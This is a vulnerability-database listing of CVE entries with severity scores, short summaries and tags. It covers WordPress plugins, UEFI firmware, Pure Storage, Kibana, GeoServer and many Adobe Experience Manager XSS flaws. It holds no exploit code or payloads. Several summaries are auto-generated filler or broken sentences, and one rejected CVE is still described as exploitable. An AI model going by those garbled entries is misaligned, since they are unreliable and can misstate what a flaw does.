The Abandoned Cart Pro for WooCommerce plugin (versions ≤9.16.0) contains an authenticated arbitrary file upload vulnerability in the wcap_add_to_cart_popup_upload_files function that lacks file type validation. Authenticated attackers with subscriber-level privileges can upload arbitrary files to the server, potentially enabling remote code execution depending on server configuration. This is a high-severity vulnerability (CVSS 8.8) affecting WooCommerce e-commerce sites; exploitation requires valid user credentials but no user interaction.
WordPress
File Upload
RCE
PHP
-
CVE-2025-3052
HIGH
CVSS 8.2
Critical arbitrary write vulnerability in Microsoft-signed UEFI firmware that permits attackers with high privileges to execute untrusted code and modify firmware settings stored in NVRAM, potentially enabling persistence mechanisms and full system compromise. The vulnerability affects UEFI implementations across multiple Microsoft platforms, with a CVSS score of 8.2 reflecting high severity. While specific KEV status and EPSS probability data were not provided in available sources, the local attack vector and high privilege requirement suggest this poses elevated risk primarily to targeted systems rather than widespread exploitation.
Microsoft
RCE
Redhat
-
CVE-2025-0052
HIGH
CVSS 8.3
CVE-2025-0052 is an improper input validation vulnerability in Pure Storage FlashBlade's authentication process that allows unauthenticated network attackers to trigger a denial of service condition with high availability impact. While the CVSS score of 8.3 reflects significant availability risk, the high attack complexity (AC:H) suggests practical exploitation requires specific conditions. No confirmed KEV/CISA status, active exploitation, or public POC has been disclosed at the time of analysis.
Denial Of Service
-
CVE-2025-0051
HIGH
CVSS 8.7
Improper input validation vulnerability in Pure Storage FlashArray's authentication process that enables unauthenticated network-based denial of service attacks. The vulnerability allows remote attackers without credentials to crash or degrade the availability of affected FlashArray systems by sending malformed authentication requests. This is a high-severity issue (CVSS 8.7) with network accessibility and no authentication requirements, making it broadly exploitable across internet-exposed or network-accessible FlashArray deployments.
Denial Of Service
-
CVE-2024-43706
HIGH
CVSS 7.6
CVE-2024-43706 is an improper authorization vulnerability in Kibana's Synthetic monitor endpoint that allows authenticated users to escalate privileges through direct HTTP requests. Attackers with low-level credentials can bypass access controls to perform unauthorized actions on synthetic monitoring functionality, potentially affecting confidentiality, integrity, and availability. While the CVSS 7.6 score indicates significant risk, real-world impact depends on deployment context and whether this vulnerability is actively exploited in the wild.
Elastic
Privilege Escalation
Authentication Bypass
Kibana
-
CVE-2024-29198
HIGH
CVSS 7.5
GeoServer contains a Server-Side Request Forgery (SSRF) vulnerability in the Demo request endpoint (TestWfsPost servlet) that allows unauthenticated network attackers to make arbitrary HTTP requests from the server when Proxy Base URL is not configured. This high-severity vulnerability (CVSS 7.5) affects GeoServer versions prior to 2.24.4 and 2.25.2, enabling attackers to access internal resources, cloud metadata endpoints, and potentially interact with backend systems.
Java
SSRF
Geoserver
-
CVE-2024-13090
HIGH
CVSS 7.0
Privilege escalation vulnerability affecting service accounts through excessively permissive sudo rules that could allow elevation to administrative privileges. The vulnerability requires local access and lower privileges to exploit (CVSS 7.0), but notably, no actual exploitation vector has been identified in the wild. While the CVSS score indicates high impact potential, the absence of a confirmed attack vector and lack of active exploitation signals suggest this is a configuration hardening issue rather than an immediately critical threat.
Privilege Escalation
Linux
-
CVE-2024-13089
HIGH
CVSS 7.2
CVE-2024-13089 is an OS command injection vulnerability in the update functionality of Nozomi Networks Guardian and CMC appliances that allows authenticated administrators to bypass signature validation and execute arbitrary OS commands. While the vulnerability requires high-privilege administrative access, the improper cryptographic signature validation on update packages creates a critical integrity bypass that could lead to complete system compromise. The attack is network-accessible with no user interaction required once an administrator initiates an update.
Command Injection
-
CVE-2023-20599
HIGH
CVSS 7.9
CVE-2023-20599 is an improper register access control vulnerability in AMD's ASP (AMD Secure Processor) that allows a privileged local attacker to gain unauthorized access to the Crypto Co-Processor (CCP) registers, potentially compromising cryptographic key management and leading to loss of confidentiality or integrity. The vulnerability affects AMD EPYC and Ryzen processors with ASP implementations. While the CVSS score of 7.9 indicates high severity, exploitation requires high privilege level (PR:H) and local access (AV:L), limiting real-world attack surface; however, this is an actively tracked vulnerability relevant to data center and workstation security.
Privilege Escalation
Information Disclosure
-
CVE-2025-49510
MEDIUM
CVSS 4.3
Cross-Site Request Forgery (CSRF) vulnerability in WPFactory Min Max Step Quantity Limits Manager for WooCommerce allows Cross Site Request Forgery.This issue affects Min Max Step Quantity Limits Manager for WooCommerce: from n/a through 5.1.0.
WordPress
CSRF
PHP
-
CVE-2025-49509
MEDIUM
CVSS 5.3
CVE-2025-49509 is a security vulnerability (CVSS 5.3). Remediation should follow standard vulnerability management procedures.
Authentication Bypass
-
CVE-2025-49143
MEDIUM
CVSS 5.9
Nautobot is a Network Source of Truth and Network Automation Platform. Prior to v2.4.10 and v1.6.32 , files uploaded by users to Nautobot's MEDIA_ROOT directory, including DeviceType image attachments as well as images attached to a Location, Device, or Rack, are served to users via a URL endpoint that was not enforcing user authentication. As a consequence, such files can be retrieved by anonymous users who know or can guess the correct URL for a given file. Nautobot v2.4.10 and v1.6.32 address this issue by adding enforcement of Nautobot user authentication to this endpoint.
Information Disclosure
Nautobot
-
CVE-2025-49133
MEDIUM
CVSS 5.9
Libtpms is a library that targets the integration of TPM functionality into hypervisors, primarily into Qemu. Libtpms, which is derived from the TPM 2.0 reference implementation code published by the Trusted Computing Group, is prone to a potential out of bounds (OOB) read vulnerability. The vulnerability occurs in the ‘CryptHmacSign’ function with an inconsistent pairing of the signKey and signScheme parameters, where the signKey is ALG_KEYEDHASH key and inScheme is an ECC or RSA scheme. The reported vulnerability is in the ‘CryptHmacSign’ function, which is defined in the "Part 4: Supporting Routines - Code" document, section "7.151 - /tpm/src/crypt/CryptUtil.c ". This vulnerability can be triggered from user-mode applications by sending malicious commands to a TPM 2.0/vTPM (swtpm) whose firmware is based on an affected TCG reference implementation. The effect on libtpms is that it will cause an abort due to the detection of the out-of-bounds access, thus for example making a vTPM (swtpm) unavailable to a VM. This vulnerability is fixed in 0.7.12, 0.8.10, 0.9.7, and 0.10.1.
Buffer Overflow
Information Disclosure
Ubuntu
Debian
Libtpms
-
CVE-2025-48937
MEDIUM
CVSS 4.9
matrix-rust-sdk is an implementation of a Matrix client-server library in Rust. matrix-sdk-crypto since version 0.8.0 and up to 0.11.0 does not correctly validate the sender of an encrypted event. Accordingly, a malicious homeserver operator can modify events served to clients, making those events appear to the recipient as if they were sent by another user. This vulnerability is fixed in 0.11.1 and 0.12.0.
Authentication Bypass
Suse
-
CVE-2025-48879
MEDIUM
CVSS 6.5
A security vulnerability in OctoPrint versions up until and including 1.11.1 contain a vulnerability that (CVSS 6.5) that allows any unauthenticated attacker. Remediation should follow standard vulnerability management procedures. Vendor patch is available.
Information Disclosure
Debian
Octoprint
-
CVE-2025-48067
MEDIUM
CVSS 5.4
CVE-2025-48067 is a security vulnerability (CVSS 5.4) that allows an attacker with the file_upload permission. Remediation should follow standard vulnerability management procedures. Vendor patch is available.
Information Disclosure
Debian
Octoprint
-
CVE-2025-47969
MEDIUM
CVSS 4.4
Exposure of sensitive information to an unauthorized actor in Windows Hello allows an authorized attacker to disclose information locally.
Microsoft
Information Disclosure
Windows Server 2025
Windows 11 24h2
Windows 11 23h2
-
CVE-2025-47956
MEDIUM
CVSS 5.5
A security vulnerability in External control of file name or path in Windows Security App (CVSS 5.5) that allows an authorized attacker. Remediation should follow standard vulnerability management procedures.
Microsoft
Information Disclosure
Windows Security App
Windows
-
CVE-2025-47171
MEDIUM
CVSS 6.7
Improper input validation in Microsoft Office Outlook allows an authorized attacker to execute code locally.
Microsoft
Information Disclosure
365 Apps
Office Long Term Servicing Channel
Office
-
CVE-2025-47160
MEDIUM
CVSS 5.4
Protection mechanism failure in Windows Shell allows an unauthorized attacker to bypass a security feature over a network.
Microsoft
Authentication Bypass
Windows 10 1507
Windows 11 24h2
Windows Server 2016
-
CVE-2025-47117
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47116
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47115
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47114
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47113
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47112
MEDIUM
CVSS 5.5
Acrobat Reader versions 24.001.30235, 20.005.30763, 25.001.20521 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
Buffer Overflow
Adobe
Information Disclosure
Acrobat Dc
Acrobat Reader
-
CVE-2025-47111
MEDIUM
CVSS 5.5
Acrobat Reader versions 24.001.30235, 20.005.30763, 25.001.20521 and earlier are affected by a NULL Pointer Dereference vulnerability that could lead to application denial-of-service. An attacker could exploit this vulnerability to crash the application, causing a disruption in service. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
Null Pointer Dereference
Adobe
Denial Of Service
Acrobat
Acrobat Reader Dc
-
CVE-2025-47106
MEDIUM
CVSS 5.5
InDesign Desktop versions ID20.2, ID19.5.3 and earlier are affected by a Use After Free vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
Use After Free
Denial Of Service
Memory Corruption
Indesign
-
CVE-2025-47105
MEDIUM
CVSS 5.5
InDesign Desktop versions ID20.2, ID19.5.3 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
Buffer Overflow
Information Disclosure
Indesign
-
CVE-2025-47104
MEDIUM
CVSS 5.5
InDesign Desktop versions ID20.2, ID19.5.3 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
Buffer Overflow
Information Disclosure
Indesign
-
CVE-2025-47102
MEDIUM
CVSS 5.4
Rejected reason: This CVE ID was issued in error by its CVE Numbering Authority and does not represent a valid vulnerability. Rated medium severity (CVSS 5.4), this vulnerability is remotely exploitable, low attack complexity. No vendor patch available.
Information Disclosure
-
CVE-2025-47094
MEDIUM
CVSS 6.1
Adobe Experience Manager versions 6.5.22 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
Adobe
XSS
Experience Manager
-
CVE-2025-47093
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47092
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47091
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47090
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47089
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47088
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47087
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47086
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47085
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47084
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47083
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47082
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47081
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47080
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47079
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47078
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47077
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47076
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47075
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47074
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47073
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47072
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47071
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47070
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47069
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47068
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47067
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47066
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47065
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47063
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47062
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47060
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47057
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47056
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47055
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47052
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47051
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47050
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47049
MEDIUM
CVSS 6.1
Adobe Experience Manager versions 6.5.22 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a specially crafted web page.
Adobe
XSS
Experience Manager
-
CVE-2025-47048
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47047
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47045
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47044
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47042
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47041
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47040
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47039
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47038
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47037
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47036
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47035
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47034
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47033
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47032
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47031
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
